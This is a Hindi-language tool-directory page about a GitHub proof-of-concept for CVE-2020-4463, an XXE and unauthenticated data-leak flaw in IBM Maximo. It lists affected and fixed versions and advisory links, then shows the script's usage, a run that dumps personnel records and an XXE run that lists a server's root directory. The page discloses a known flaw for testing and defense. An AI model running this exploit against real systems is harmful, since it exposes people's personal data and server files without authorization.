Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-4463 — IBM Maximo Asset Management, XXE भेद्यता (CVE-2020-4463) के माध्यम से सूचना प्रकटीकरण के प्रति संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/ibonok/cve-2020-4463
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubibonok/cve-2020-4463

CVE-2020-4463

IBM Maximo Asset Management, XXE भेद्यता (CVE-2020-4463) के माध्यम से सूचना प्रकटीकरण के प्रति संवेदनशील है।

रिपॉजिटरी देखें
52172 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

IBM Maximo Asset Management XXE भेद्यता (CVE-2020-4463) के माध्यम से सूचना प्रकटीकरण के लिए संवेदनशील है

IBM Maximo Asset Management, XML डेटा संसाधित करते समय XML एक्सटर्नल एंटिटी इंजेक्शन (XXE) हमले के लिए संवेदनशील है। एक दूरस्थ हमलावर इस भेद्यता का फायदा उठाकर संवेदनशील जानकारी उजागर कर सकता है या मेमोरी संसाधनों को खपत कर सकता है।

आधार स्कोर: 8.2

वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

प्रभावित मुख्य घटक

IBM Maximo Asset Management 7.6.0
IBM Maximo Asset Management 7.6.1
IBM Maximo Asset Management के 7.6.0 से पहले के सभी संस्करण

प्रभावित उत्पाद

Maximo for Aviation
Maximo for Life Sciences
Maximo for Nuclear Power
Maximo for Oil and Gas
Maximo for Transportation
Maximo for Utilities
SmartCloud Control Desk
IBM Control Desk
Tivoli Integration Composer

संस्करण में पैच किया गया

फिक्स्ड संस्करण: Maximo Asset Management 7.6.1.2
पिछले संस्करण: समाधान देखें (नीचे लिंक)

लिंक:

  • https://nvd.nist.gov/vuln/detail/CVE-2020-4463
  • https://www.ibm.com/support/pages/node/6253953

PoC

यहाँ अब भेद्यता के लिए PoC है। केवल IBM द्वारा उल्लिखित संस्करण ही संवेदनशील नहीं हैं। संस्करण 7.6.0 से पहले के सभी संस्करण भी संवेदनशील हो सकते हैं।

PoC सिस्टम पर मौजूद होने वाली 2 भेद्यताओं की जाँच करता है। एक डेटा रिसाव भेद्यता जिसका शोषण किया जा सकता है यदि कोई प्रमाणीकरण लागू नहीं है और XXE भेद्यता जिसका शोषण किया जा सकता है यदि कॉन्फ़िगरेशन में एक निश्चित मान (mxe.int.resolvexmlextentity=0) सेट नहीं है।

उदाहरण

उपयोग

root@kitploit:~
python3 CVE-2020-4463.py --help
usage: CVE-2020-4463.py [-h] [-x [XXE]] [-d [DATALEAK]] [--url [URL]]

CVE-2020-4463 PoC Data Leakage and XXE

optional arguments:
  -h, --help            show this help message and exit
  -x [XXE], --xxe [XXE]
                        XXE (Linux/Windows)
  -d [DATALEAK], --dataleak [DATALEAK]
                        Data Leakage REST request MXPERSON. May take a long
                        time.
  --url [URL]           Target URL http://, https://

यदि आपको निम्नलिखित प्रतिक्रिया मिलती है, तो दोनों भेद्यताएँ मौजूद नहीं हैं।

root@kitploit:~
Error 500: BMXAA1268E - No user credentials.

डेटा रिसाव

यदि डेटाबेस में कई प्रविष्टियाँ हैं तो इसमें लंबा समय लग सकता है।

root@kitploit:~
CVE-2020-4463 git:(master) ✗ python3 CVE-2020-4463.py --url https://10.0.0.1 -d

<?xml version="1.0" encoding="UTF-8"?>
<QueryMXPERSONResponse xmlns="http://www.ibm.com/maximo" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    creationDateTime="2020-11-16T10:42:49+01:0 0" transLanguage="EN" baseLanguage="EN"
    messageID="6927296.160551977018422092" maximoVersion="7 6 20170418-0100 V7608-61" rsStart="0" rsTotal="4374"
    rsCount="4374">
    <MXPERSONSet>
        <PERSON>
            <ADDRESSLINE1></ADDRESSLINE1>
            <CITY></CITY>
            <CLASSSTRUCTUREID></CLASSSTRUCTUREID>
            <COUNTRY></COUNTRY>
            <C_DESCRIZIONE></C_DESCRIZIONE>
            <C_MATRICOLA></C_MATRICOLA>
            <C_QUALIFICA></C_QUALIFICA>
            <FIRSTNAME>Lxxxxxxx</FIRSTNAME>
            <LANGUAGE>IT</LANGUAGE>
            <LASTNAME>xxxxxx</LASTNAME>
            <PERSONID>Lxxxxxxx</PERSONID>
            <POSTALCODE></POSTALCODE>
            <PRIMARYEMAIL>[email protected]</PRIMARYEMAIL>
            <PRIMARYPHONE></PRIMARYPHONE>
            <STATEPROVINCE></STATEPROVINCE>
            <STATUS maxvalue="ACTIVE">ACTIVE</STATUS>
            <TITLE></TITLE>
            <USERNOTFTYPE></USERNOTFTYPE>
            <EMAIL>
                <EMAILADDRESS>[email protected]</EMAILADDRESS>
            </EMAIL>
        </PERSON>

XXE

root@kitploit:~
CVE-2020-4463 git:(master) ✗ python3 CVE-2020-4463.py --url https://10.0.0.1 -x          

Error 500: BMXAA4160E - A major exception has occurred. Check the system log to see if there are any companion errors logged. Report this error to your system administrator.
	/c: &#40;No such file or directory&#41;
Error 500: For input string: &quot;bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost&#43;found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
&quot;
टूल डाउनलोड करें